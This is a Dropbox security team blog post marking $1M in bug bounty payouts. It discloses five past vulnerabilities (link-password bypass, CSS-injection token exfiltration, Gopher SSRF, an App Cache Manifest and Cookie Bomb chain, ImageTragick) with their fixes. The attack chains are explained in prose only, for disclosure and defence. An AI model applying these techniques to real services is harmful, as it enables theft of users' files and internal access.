This guest blog post was authored by Dropbox’s Product Security Team and originally published on the Dropbox company blog.

Over the past five years, our bug bounty program has become an important part of improving our security posture, as it is now for many large tech companies. Transparency and defending the rights of legitimate researchers are cornerstones of the progress we’ve made, and the world is safer for it. To those outside of the security community, it may seem counterintuitive that you can make your platform safer by encouraging security researchers to attack you, but that’s exactly the value that these programs deliver. This process of discovering and remediating bugs is key to our maintaining a highly secure organization and increasingly hardened product surfaces. Our bug bounty program is only part of having a complete secure development lifecycle program.

Our bug bounty program recently passed a significant milestone. Since launching our program in 2014 and tripling our bounties in 2017, we’ve given more than $1,000,000 to bug bounty participants for valid findings submitted to our program. Not only has Dropbox benefitted from our bug bounty program, but so have some of our most critical vendors who have remained active participants in our program. Together with our vendors, we have partnered up in two live hacking events including the HackerOne one-day bug bounty event in Singapore. Additionally, charities have also benefited from our continued investment in security through bug bounty reporters that have leveraged our donation matching policy to donate more than $10,000 to charities around the world.

Top 5 Favorite Bugs Reported

To help celebrate this momentous occasion, the Dropbox Production Security team wanted to disclose, in-depth, five of our favorite reports we’ve ever received. We feel these amazing findings by our top bug bounty hunters impressed us, taught us, and validated the work we do in raising the bar for security.

5. Shared Link Password Bypass

HackerOne Report by detroitsmash

Have you ever wanted to share a file via link but were afraid that anyone with the link would be able to access it? Dropbox Professional and Business customers are able to password protect their shared links via an option in Link Settings. This ensures that only users with the password for the link are able to access the file.

One of our top bug bounty reporters, detroitsmash, reported on December 25, 2018 that one of our endpoints responsible for performing document previews in Paper documents was ignoring passwords set on shared links. This would allow an attacker with a copy of a password protected shared link to be able to bypass the password requirement and view the document.

The endpoint works as follows:

  1. A user takes a share link for one of their documents and pastes it into Dropbox Paper.
  2. The Dropbox Paper client then sends this link to our servers via an endpoint /integrations/embed/fetch/matte?sharedLinkUrl=<shared link>.
  3. This endpoint then produces a preview image to be placed within the Paper document.

After validating the report, it was discovered that additional access control checks were missing on this endpoint. We immediately got to work on correcting this and pushed a fix out within a day. detroitsmash was awarded $10,648 for their finding and was later awarded an additional $2,744 as a bonus for being one of the best reports we received within that 6-month period.

4. Paper Notification CSS Injection

HackerOne Report by 0xacb and cache-money

Last year, Dropbox started running live hacking events with HackerOne. Live hacking events take bug bounty to the real world. Top bug bounty reporters from around the globe get together, often in person, to find vulnerabilities in a company’s software. They allow bug bounty reporters to collaborate more easily and for security teams to build stronger relationships with the bug bounty reporters that help them secure their software every day.

The most recent Dropbox live hacking event found many vulnerabilities, but one of our favorites from the event was found by 0xacb and cache-money in collaboration with our very own Product Security team. Following what was a small oversight in the name validation on one of our account registration endpoints, was a chain of little issues that resulted in the ability to remotely access another user’s Paper documents. Dropbox teams have access to a bulk user import feature that allows a Team Admin to import users listed in a CSV file. This feature is helpful for teams that have hundreds of licenses and the process of manually inviting each user one-by-one would be too cumbersome.

0xacb discovered that while our normal account signup at would ensure that users cannot use certain “illegal” characters (including < and >) in their first and last names, the account registration via CSV endpoint did not. While this is a bug, it wasn’t a security bug; it didn’t really have any security impact because we usually sanitize everything client-side with React anyway.

With the day of the event just around the corner, 0xacb joined forces with cache-money to see if they could figure out a way to escalate this weird behavior further. At one point, cache-money created a user with the name <h1>First Name</h1> and shared a paper document with 0xacb. They immediately noticed that in the Dropbox web client notifications that the user’s name rendered as “First Name” in a large, bold font. This indicated that HTML injection was possible but with our CSP and use of DOMPurify in our notifications, there was a significant barrier preventing them from escalating to XSS.

After some additional investigation, we discovered that it was possible to get this behavior to trigger on the Desktop client as well. Members from both the Product Security team as well as the bug bounty hunters spent some time trying to escalate this HTML injection into something more impactful. We concluded that the CSP rules used in the Desktop environment are too restrictive to allow for more interesting attacks.

Moving back to the web client, we realized that DOMPurify was allowing <style> tags through in the default configuration. This means that an attacker could reapply styles on the page making it look however they want. Unfortunately, another big problem with exploitation was a limit on the number of characters allowed in the first and last name fields.

Normally, an attacker can leverage CSS injection to exfiltrate sensitive tokens (like a CSRF token) from the page using selectors; however, the payload needed to perform this kind of attack usually requires hundreds of characters, not 80. After some brainstorming, we independently rediscovered a technique using an “at-rule” in CSS called @import (originally documented by sirdarckcat) which allowed us to exfiltrate tokens from the page using just CSS and a payload that was well under the 80 character limit imposed.

Now, all an attacker had to do was create a team, create a user with the payload as their first and last name, and then share a Paper document with a victim. If the victim opened their notifications, it would allow the attacker to exfiltrate the urls of Paper documents present on the page. We fixed the vulnerability the day of the H1-65 Live Hacking event and paid 0xacb and cache-money $12,167 for their report. We also awarded an additional $1,000 bonus for having the “Coolest Proof of Concept” out of all of the submissions.

3. Gopher SSRF

HackerOne Report by mlitchfield

Modern web applications often have to make requests from the server to external, third-party services to transmit and receive relevant information. Whether that be to send a notification to a developer’s webhook, read information from an external API, or to fetch a file from a remote address.

This functionality, however, can also come at a great cost. Improperly configured and mitigated, this feature can quickly turn into a vulnerability called Server-Side Request Forgery (SSRF). Server-Side Request Forgery occurs when an attacker has the ability to issue or redirect a request issued by the server into a sensitive location, often internal. The impact of SSRF ranges variably, but can lead to Remote Code Execution if unchecked.

A general mitigation for this class of attack, and the one that we commonly use here at Dropbox, is leveraging HTTP proxy servers for all server-side externally bound requests. If properly configured, the proxies will prevent requests from going to addresses that you deem sensitive like internal IPs or a metadata service. The problem with HTTP proxies, though, is that they’re usually only meant to handle HTTP and HTTPS traffic. That means if your server starts talking a protocol that isn’t HTTP-based, you can quickly find yourself beyond the help of your proxies.

Unfortunately for us, Dropbox often uses libcurl to make network requests which supports dozens of different protocols, not just HTTP and HTTPS. In the case of HackerOne report 139572, bug bounty participant Mark Litchfield discovered that by returning a 302 redirect to the request issued by Dropbox from our Saver API, that he was able to switch to an esoteric protocol called Gopher). Because Gopher is not HTTP-based, the request did not go to our configured proxies allowing him the ability to hit internal services.

Mitigation for this vulnerability was not as straight-forward as preventing redirects and disabling bad protocols at the app-layer. This could affect other places we make outbound requests in the future, too. To make our mitigation robust, we looked at all of the available protocols in libcurl and manually patched out all of the protocols we did not need to support. By approaching the mitigation this way, we have future-proofed ourselves from having this kind of problem in the future.

For the excellent work and great report written by Mark, which we received well before we raised our bounties, we awarded $6,859.

2. App Cache Manifest

HackerOne Report by fransrosen

Making a secure platform to store, share, and collaborate on files is a deceptively hard problem. Dropbox has to handle any kind of file you can throw at it while ensuring the safety of everyone else using the platform. We also want to avoid compromising the experience of working with these files as much as possible, so sanitizing a file when a user fetches it is generally off-the-table to avoid manipulating the contents and integrity of the file.

One of our main mitigations to attacks like XSS) is origin isolation. That is, we use an entirely separate origin ( to serve file contents, which often includes when we render files via iframe in the web client. By separating out the origin that we serve our file contents, we avoid needing to do any sanitization of the content and are able to serve back the raw bytes of the file. Even if the file was a malicious XSS payload, the XSS would execute in a useless origin, protecting unsuspecting victims from potential compromise.

Unfortunately, Frans discovered in early 2016 that this wasn’t entirely true. Using a lesser-known HTML feature called App Cache Manifest, Frans discovered a chain that could allow an attacker to steal raw file contents of unsuspecting users by merely sending them a link. Before we get into the details of how this attack worked, let’s talk briefly about what an App Cache Manifest is.

An App Cache Manifest is a file that describes what files a browser should cache locally for improved performance and experience. A webpage can mark itself as having an App Cache Manifest via an attribute, manifest, on the html tag at the top of the document. The browser will, based on the directives in the manifest, fetch and store any files necessary to comply with the manifest.

One important note about the App Cache Manifest is the FALLBACK directive. FALLBACK tells the browser what asset to load from the cache if a particular resource is unavailable. It’s important to note that this is not a redirect (the url of the page will not change), the browser will just serve up different contents instead of the original asset.

Now that we know what an App Cache Manifest is for, we can discuss the attack in detail.

  1. An attacker would upload an App Cache Manifest (manifest.txt) to the public folder with a FALLBACK directive that instructs the browser to load fallback.xml.
  2. An attacker would also **upload an html file, containing a Cookie Bomb payload, to their public Dropbox folder using an extension of .xml (we blocked rendering of .html and .htm files using the Content-Disposition: attachment header). This html page points a manifest html attribute at the file we previously uploaded manifest.txt. The point of the Cookie Bomb attack is to ensure that subsequent loads of will fail due to the sheer amount of cookies being sent.
  3. Lastly, the attacker would upload fallback.xml to their public folder containing a payload.

The attacker would then trick a victim into visiting or via a shared link so the user is viewing the file via our web client. The browser would then fetch the manifest marked by the manifest attribute in the payload.xml page. Then the browser fetches any of the assets marked in the manifest, including those under the FALLBACK directive. After these files are fetched, the browser would begin processing the javascript and filling up its cookie jar for the domain.

Any time the victim’s browser tried fetching from in the future, the request would fail due to the previous Cookie Bomb attack. Upon failure, the App Cache Manifest’s FALLBACK directive would kick in. It would silently load the content of the fallback page from the local cache instead of the remote asset. The fallback javascript payload would grab the current url, which contained a secret, and send the page address to the attacker so they could fetch the content themselves.

It’s quite a complicated attack, but very effective.

Mitigating this was no easy task either. It’s not quite as simple as sanitizing the javascript or blocking uploads of App Cache Manifest files. We use the following approaches as a holistic solution to our App Cache Manifest woes:

  1. We extended our disabled rendering protection to additional file types on the domain by setting Content-Disposition: attachment
  2. We isolated origins by using a CSP sandbox directive alongside allow-scripts
  3. Later, we added a defense-in-depth measure by ensuring we served our content using randomized subdomains instead of relying on just the CSP origin isolation. Each piece of content is now served on its own, isolated origin which significantly mitigates the risk of this kind of attack.

For this incredible report, we awarded Frans $10,648 for his finding. We also awarded a $2,197 bonus commemorating their report for being one of the top reports we received during that 6 month period.

1. ImageTragick

HackerOne report by Stewie

In the modern web, image processing is nearly as ubiquitous a task as authentication. From resizing profile photos, adjusting colors, or changing image formats, image processing is either supplementary or fundamental feature of a service that can make or break a user experience. For our Thumbnail and Preview pipeline, image processing is a core part of what makes the experience of quickly finding a particular document so easy.

One of the most commonly used libraries to perform image processing is ImageMagick. With support for over 200 image formats and numerous transformations, ImageMagick tries to be a one-stop-shop for all of your image processing needs.

Stewie, with further improvements by Nikolay Ermishkin of the security team, discovered a series of vulnerabilities within ImageMagick, dubbed “ImageTragick.” Of the findings, the more serious entries involve a Remote Code Execution (RCE), SSRF, and Local File Inclusion (LFI) allowing an attacker plenty of ways to go about attacking a vulnerable target.

The attack primarily leverages an esoteric file format called “MVG” or Magick Vector Graphics. MVG, similar to SVG, leverages instructions that tell the image processor how to construct the vectorized image as opposed to including the raw image data in the file. Unfortunately, some of the instructions, as well as their implementations in ImageMagick, allow for exploitation if mitigations are not in place.

ImageTragick would have been the stuff of nightmares for many security teams back in 2016; however, this story has a happy ending for Dropbox. While we were vulnerable to ImageTragick, as Stewie pointed out in report 133377, our robust jailing infrastructure was able to mitigate a majority of the impact. Even the RCE variant of ImageTragick was not enough to cause us much worry as our jails limit network connectivity, access to other users’ files, and even which syscalls can be invoked. By leveraging solid isolation practices, we’ve been able to mitigate most of the risk from running unsafe and untrusted binaries like ImageMagick, xmlsec, and even LibreOffice.

Even though the risk to Dropbox was minimal, we awarded $729 for the finding and gave an additional $512 for providing the mitigation to this 0-day.


At Dropbox, we value the relationships we continue to build with the security researcher community. We strive to attract the top bug hunting talent in the world. There are many friendly bug bounty reporters out there dedicated to finding vulnerabilities. With their help, it keeps the vulnerabilities out of the bad actors hands. After crossing the $1 million payout threshold, Dropbox is going to keep working towards the next million and beyond.

These five bugs discussed are just a few examples that validated the diligent work and impact of the Dropbox Security team, revealed how different risks can manifest from multiple directions, and helped make Dropbox a safer and more secure platform.

Special thanks to Nathanial Lattimer aka @d0nut

To learn more about Dropbox’s bug bounty program or to start hacking, visit

Posted by Charlie